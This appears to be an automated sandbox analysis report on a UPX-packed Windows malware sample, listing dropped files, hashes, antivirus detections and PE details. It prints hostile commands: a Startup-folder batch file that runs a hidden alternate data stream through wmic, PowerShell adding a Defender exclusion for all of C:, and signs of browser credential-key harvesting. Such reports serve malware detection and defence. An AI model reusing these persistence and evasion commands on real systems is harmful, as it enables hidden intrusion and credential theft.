                        SHA-512:70DABDCDAE178CFB3D22EE2B00EBB747D17504864E68550256C5EE74B8D17506F88C0F057C8B91E666146B6E758C6C10EEDC123C871E2203C2BF5F67BD05EC66
                        Malicious:false
                        Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2022-02-06..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

                        C:\Program Files\Microsoft DN1\sqlmap.dll

                        Download File
                        Process:C:\ProgramData\images.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):116736
                        Entropy (8bit):5.884975745255681
                        Encrypted:false
                        SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                        MD5:461ADE40B800AE80A40985594E1AC236
                        SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                        SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                        SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Virustotal, Detection: 49%, Browse
                        • Antivirus: Metadefender, Detection: 20%, Browse
                        • Antivirus: ReversingLabs, Detection: 50%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                        C:\ProgramData:ApplicationData

                        Download File
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Category:modified
                        Size (bytes):222720
                        Entropy (8bit):7.862505245807072
                        Encrypted:false
                        SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                        MD5:DABC6F0C75C134E5310BA3526ADBA833
                        SHA1:854EC103A64182C97E8F25E45DA04889DBBBF3FF
                        SHA-256:9F9BAE001065A649A78CE6DE997F160EF32D03A2C28F4633A8386F75C938CADF
                        SHA-512:C596890BF6062890483E9EE276C890B04396C8C6C758B318AB0D218C506AE362DB32E13FAF9691B2B96D5A4EDE03EE107C5B01714AB06C86C465EBD23326E877
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 24%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y.........................................................................................1.......Y.............Rich............PE..L...3..b.................P... ......P;.......@....@..........................`............@.................................\N.......@..\....................P..(...........................L=......l=..............................................UPX0....................................UPX1.....P.......P..................@....rsrc.... ...@.......T..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....

                        C:\ProgramData\images.exe

                        Download File
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Category:dropped
                        Size (bytes):222720
                        Entropy (8bit):7.862505245807072
                        Encrypted:false
                        SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                        MD5:DABC6F0C75C134E5310BA3526ADBA833
                        SHA1:854EC103A64182C97E8F25E45DA04889DBBBF3FF
                        SHA-256:9F9BAE001065A649A78CE6DE997F160EF32D03A2C28F4633A8386F75C938CADF
                        SHA-512:C596890BF6062890483E9EE276C890B04396C8C6C758B318AB0D218C506AE362DB32E13FAF9691B2B96D5A4EDE03EE107C5B01714AB06C86C465EBD23326E877
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 24%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y.........................................................................................1.......Y.............Rich............PE..L...3..b.................P... ......P;.......@....@..........................`............@.................................\N.......@..\....................P..(...........................L=......l=..............................................UPX0....................................UPX1.....P.......P..................@....rsrc.... ...@.......T..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....

                        C:\ProgramData\images.exe:Zone.Identifier

                        Download File
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14734
                        Entropy (8bit):4.993014478972177
                        Encrypted:false
                        SSDEEP:384:wZvOdB8Ypib4JNXp59HopbjvwRjdvRlAYotiQ0HzAF8:UvOdB8YNNZjHopbjoRjdvRlAYotinHzr
                        MD5:C5A56B913DEEDCF5AE01A2D4F8AA69CE
                        SHA1:C91D19BFD666FDD02B0739893833D4E1C0316511
                        SHA-256:1C5C865E5A98F33E277A81FCDADFBAB1367176BA14F8590022F7E5880161C00D
                        SHA-512:1058802FCD54817359F84977DD26AD4399C572910E67114F70B024EBADDF4E35E6AFF6461F90356205228B4B860E69392ABC27D38E284176C699916039CFA5ED
                        Malicious:false
                        Preview:PSMODULECACHE......#y;...Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer........-.^(...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy........Unregister-AppBackgroundTask........Get-AppBackgroundTask........tid........pfn........iru....%...Enable-AppBackgroundTaskDiagnosticLog........Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Unins

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):21524
                        Entropy (8bit):5.603674470472126
                        Encrypted:false
                        SSDEEP:384:itL6k0H6SVTDJ0Nr+RnYSBKnaul6GspE93G1u16zx5mHKHVY37bHjqIvUI++j/:r6gJlY4KaulKwG3xU+u7Lmly
                        MD5:1492AC13C2B1E111C5C1164CAC260A7A
                        SHA1:E674BAB629FFA7437600288ADA10F76C318C8BE4
                        SHA-256:7093EAF8B4AEF9C1537F6D8E33993183D70CB3E90820901A7253C8DC2BFF12FF
                        SHA-512:910A51D461442A23171DAA166446024609123C1521FDDDAE80966295FBAA04C6564404D9BDDC9A313E8E4F26B057315A709248F5B8621039B787EDE11C826FD3
                        Malicious:false
                        Preview:@...e.....................K.....N....................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)P.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1iuid1f.5zn.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_caqnsxdv.wy2.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oeqxrick.g20.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujlz1kts.jjg.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Roaming\GmCssxF.tmp

                        Download File
                        Process:C:\ProgramData\images.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.792852251086831
                        Encrypted:false
                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat

                        Download File
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):140
                        Entropy (8bit):4.86129651314522
                        Encrypted:false
                        SSDEEP:3:QwZ2vOUrKaM6eNGRjDWXp5cViEaKC5SufyM1K/RFofD6tRQLRWLyLRHgn:QElPhxuWXp+NaZ5SuH1MUmt2FWLyS
                        MD5:C2E52EDB9BA6919C7D9F3CF0B88221E2
                        SHA1:9972112AF86B48E937E589E262D21BAD251A6010
                        SHA-256:FAE189421B6E7CC977F1D2A69D712C97B22E810B0AE3F2F4E258E1112694C560
                        SHA-512:FDDEDA3E5D597D086B9C4412621078B3D14B6624DF2B003CA3238E3BD03DE35AAF3E16F04339AC54B04A723F98E76F17D74263F7D1CCBCA92B6FD2C325014B3B
                        Malicious:true
                        Preview:for /F "usebackq tokens=*" %%A in ("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start") do %%A

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start

                        Download File
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):59
                        Entropy (8bit):4.2659637614761765
                        Encrypted:false
                        SSDEEP:3:eGAjGJwbZkREfcjMGERMQhM:ZuGJwi8cwGj
                        MD5:579E29CEC6BDE04C5C074D8311D6B884
                        SHA1:2FDFD4C6B8EB43A4C6F4C0D3998E4A5364221DFF
                        SHA-256:65138897F467ADF9FE20594326D724D2CD5B437D9AACF5F83721AF340F70CE3C
                        SHA-512:4011A9FD58C1DC8AA3ED79589D7232BBD06EB3FB32513D3C5B59B740ED89FDC9CCC9F3291812AFFF2CD679820BCD940AE3A49E41EBCBE20413821ACAD7C5191D
                        Malicious:true
                        Preview:wmic process call create '"C:\ProgramData:ApplicationData"'

                        C:\Users\user\AppData\Roaming\pBlACIg.tmp

                        Download File
                        Process:C:\ProgramData\images.exe
                        File Type:ASCII text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):87165
                        Entropy (8bit):6.102565506017432
                        Encrypted:false
                        SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                        MD5:CC02ABB348037609ED09EC9157D55234
                        SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                        SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                        SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                        Malicious:false
                        Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

                        C:\Users\user\Documents\20220522\PowerShell_transcript.301389.NKMfFw_y.20220522123330.txt

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):5048
                        Entropy (8bit):5.391537877355324
                        Encrypted:false
                        SSDEEP:96:BZEh2N58qDo1ZiZDh2N58qDo1ZgM6UjZ1h2N58qDo1ZVFEEdZW:N8vd
                        MD5:6845E5380ACF1B628551D90AE54909EF
                        SHA1:B9C3A195360C41016D305960471481CA9DA3E94C
                        SHA-256:3DEDBC9EE9E3D116C54885B6DBA56C67ACB7442EDD6DEFE55C5FF1B497D33E0C
                        SHA-512:D9D9828E9A3426342ECAA3F9D2E4938DFC939B66BE9FDF358C4D5B0083AAFCE00729CE5160C9839E06F071C8DC459F01E14F5EFD01218A57EDA917CD9CB4DF5F
                        Malicious:false
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220522123355..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6732..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220522123356..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220522123738..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                        C:\Users\user\Documents\20220522\PowerShell_transcript.301389.c9F2HF06.20220522123314.txt

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):5048
                        Entropy (8bit):5.393687137718255
                        Encrypted:false
                        SSDEEP:96:BZ9h2N5dqDo1ZEZ6h2N5dqDo1ZQM6UjZoh2N5dqDo1ZFFEERZo:OINQ
                        MD5:CD40D7F27D7F40B312A0A16DBE7ACE72
                        SHA1:A66F76313958430BF10322D8428A43ACE8DDBF4E
                        SHA-256:C0A23C24DF8C9D780BD4D84A63AA4AD9AB61C416349B1E4A8F76087EE294A06A
                        SHA-512:A3920F40E3708648D47162DD70C400F2990150E68B4DBD7BFBCFAF95FDFC89D378FB479982EFBBAC9BE02E3E16D7C689569F831AC04F7E970FB64933C4DA7BF2
                        Malicious:false
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220522123336..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6368..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220522123336..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220522123656..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                        \Device\ConDrv

                        Download File
                        Process:C:\Windows\System32\wbem\WMIC.exe
                        File Type:ASCII text, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):140
                        Entropy (8bit):5.001523394375711
                        Encrypted:false
                        SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys36JQAimXv:Yw7gJGWMXJXKSOdYiygKkXe/qeAiY
                        MD5:DA5950D62F7968DA1F66E3811A9061F9
                        SHA1:69B83F624AA9EC9EA09BE0E165499B436101F9EA
                        SHA-256:C09AF5F39B8BF613C007465A63F70E84766710CEE7FEB62780433C9D8C248AD7
                        SHA-512:6291C46BC66AEC7AEB973EE076146AF54C800A63F3F6F9C0EF01DA6535539E2F44FBF0BACBEAF66C4D34C4BE122AD728F62681E408FA710127120806D952DC9E
                        Malicious:false
                        Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ReturnValue = 9;..};....

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Entropy (8bit):7.862505245807072
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.66%
                        • UPX compressed Win32 Executable (30571/9) 0.30%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File size:222720
                        MD5:dabc6f0c75c134e5310ba3526adba833
                        SHA1:854ec103a64182c97e8f25e45da04889dbbbf3ff
                        SHA256:9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf
                        SHA512:c596890bf6062890483e9ee276c890b04396c8c6c758b318ab0d218c506ae362db32e13faf9691b2b96d5a4ede03ee107c5b01714ab06c86c465ebd23326e877
                        SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                        TLSH:56241287323D8975D465A27C079AD56083B8FE074D9B853F615A338F4EBE472036EB20
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..............................................................................................1.......Y.............Rich...

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x553b50
                        Entrypoint Section:UPX1
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x62861233 [Thu May 19 09:47:31 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:12223521b494f53df3a1fd878d789144

                        Entrypoint Preview

                        Instruction
                        pushad
                        mov esi, 0051F000h
                        lea edi, dword ptr [esi-0011E000h]
                        mov dword ptr [edi+0014B3ACh], 0BA0189Ah
                        push edi
                        jmp 00007FDC94A25773h
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        mov al, byte ptr [esi]
                        inc esi
                        mov byte ptr [edi], al
                        inc edi
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDC94A2574Fh
                        mov eax, 00000001h
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        add ebx, ebx
                        jnc 00007FDC94A2576Dh
                        jne 00007FDC94A2578Ah
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDC94A25781h
                        dec eax
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        jmp 00007FDC94A25736h
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        jmp 00007FDC94A257B4h
                        xor ecx, ecx
                        sub eax, 03h
                        jc 00007FDC94A25773h
                        shl eax, 08h
                        mov al, byte ptr [esi]
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007FDC94A257D7h
                        sar eax, 1
                        mov ebp, eax
                        jmp 00007FDC94A2576Dh
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDC94A2572Eh
                        inc ecx
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDC94A25720h
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        add ebx, ebx
                        jnc 00007FDC94A25751h
                        jne 00007FDC94A2576Bh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jnc 00007FDC94A25746h
                        add ecx, 02h
                        cmp ebp, 00000000h

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x154e5c0x1c0.rsrc
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1540000xe5c.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x15501c0x28.rsrc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x153d4c0x18UPX1
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x153d6c0xc0UPX1
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        UPX00x10000x11e0000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        UPX10x11f0000x350000x35000False0.97481666421data7.88845284004IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc0x1540000x20000x1200False0.366102430556data3.93920974475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        TYPELIB0x15418c0x834dataEnglishUnited States
                        RT_DIALOG0x14dce00x1aedataEnglishUnited States
                        RT_STRING0x14de900x2edataEnglishUnited States
